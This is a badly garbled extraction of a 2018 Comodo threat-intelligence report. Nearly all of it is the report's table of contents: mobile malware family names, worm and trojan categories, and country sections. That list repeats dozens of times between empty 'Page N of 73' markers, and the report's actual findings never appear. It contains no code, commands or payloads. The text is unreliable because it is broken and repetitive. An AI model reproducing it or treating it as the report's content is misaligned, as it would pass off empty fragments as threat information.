76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 51 of 73



of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 52 of 73






of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 53 of 73






of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 54 of 73






of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 55 of 73






of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 56 of 73






of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 57 of 73



of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 58 of 73






of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 59 of 73






of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 60 of 73






of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 61 of 73




of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 62 of 73






of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 63 of 73




of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 64 of 73



of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 65 of 73

73 South Korea



of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 66 of 73

74 North Korea



of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 67 of 73

75 Armenia



of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 68 of 73

76 Belarus



of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 69 of 73

77 Iraq



of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 70 of 73

78 Ukraine



of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 71 of 73

79 Croatia



of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 72 of 73




of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions

NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions

Global Threat Report - comodo.com · Global Threat Report Q2 2018 Edition Page 4 of 73 2 Trojans...

Documents

Transcript of Global Threat Report - comodo.com · Global Threat Report Q2 2018 Edition Page 4 of 73 2 Trojans...